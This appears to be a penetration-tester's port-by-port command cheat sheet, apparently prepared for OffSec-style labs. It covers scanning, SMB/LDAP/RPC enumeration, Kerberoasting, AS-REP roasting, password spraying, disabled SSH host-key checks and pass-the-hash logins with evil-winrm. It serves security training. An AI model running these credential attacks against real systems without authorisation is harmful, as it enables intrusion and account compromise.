NMAP Scan
#Initial Scan
nmap -sn <IP>.0/24
nmap -p- --min-rate 1000 -T4 <IP>
sudo nmap -sU --top-ports 100 <IP>
#Full Scan
nmap -sC -sV -p<PORTS> <IP> -oN nmap.txt
#Other Scans
nmap -A <IP>
nmap --script vuln <IP>
#-iL <FILE> to read targets from a list
#List Nmap Scripts
ls /usr/share/nmap/scripts/
FTP (21)
ftp anonymous@<IP>
ls
get <FILE>
put <FILE>
SSH (22)
ssh <USER>@<IP>
#Skips host-key verification, so a changed or spoofed host key is not detected
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null anonymous@<IP>
DNS (53)
#Zone Transfer
dig axfr @<DNS-IP> <domain>
#Reverse Lookup
dig -x <IP>
dnsrecon -d <domain>
nslookup <domain>
host <domain>
Kerberos (88)
nmap -p88 --script krb5-enum-users <IP>
#ASREP Roasting
impacket-GetNPUsers <domain>/ -usersfile users.txt -dc-ip <IP> -request
#Kerberoasting
impacket-GetUserSPNs -request -dc-ip <IP> <domain>/<user>
kerbrute
#User enumeration
kerbrute userenum -d <domain> --dc <IP> users.txt -v
#Password Spraying
kerbrute passwordspray -d <domain> --dc <IP> <Users List> Password123
RPC (135)
rpcclient
rpcclient -U '' -N <IP>
#rpcclient commands
enumdomusers
enumdomgroups
queryuser <RID>
SMB (139,445)
SMBClient
nmap --script smb-enum-shares,smb-enum-users -p139,445 <IP>
#List Shares
smbclient -N -L //<IP>
smbclient //<IP>/<SHARE>
smbclient //<IP>/<SHARE> --user <USER> --password <PASS>
smbclient //<IP>/<SHARE> -N -c "recurse;ls" #List share contents recursively
get <FILE>
put <FILE>
NXC
nxc smb <IP> -u <USER> -p <PASS> --shares
nxc smb <IP> --users
LDAP (389)
ldapdomaindump
ldapdomaindump ldap://<IP> -u '<domain>\<user>' -p '<pass>'
ldapsearch
ldapsearch -H ldap://<IP> -x -b"DC=vault,DC=offsec" > ldap_dump.txt
#Anonymous
ldapsearch -x -H ldap://<IP> -s base namingcontexts
#Dump Users
ldapsearch -x -H ldap://<IP> -b "DC=vault,DC=offsec" "(objectClass=user)"
#Dump Computers
ldapsearch -x -H ldap://<IP> -b "DC=vault,DC=offsec" "(objectClass=computer)"
#Dump Groups
ldapsearch -x -H ldap://<IP> -b "DC=vault,DC=offsec" "(objectClass=group)"
NFS (2049)
showmount -e <IP>
mount -t nfs <IP>:/share /mnt
RDP (3389)
xfreerdp3 /v:<IP> /u:<USER> /p:'<PASS>' /dynamic-resolution /drive:parrot,/home/parrot/Desktop/temp /cert-ignore
xfreerdp3 /cert:ignore /v:192.168.196.113 /u:student /p:lab +dynamic-resolution
#/pth:<HASH>
WinRM (5985/5986)
evil-winrm -i <IP> -u <USER> -p <PASS>
evil-winrm -i <IP> -u <USER> -H <HASH>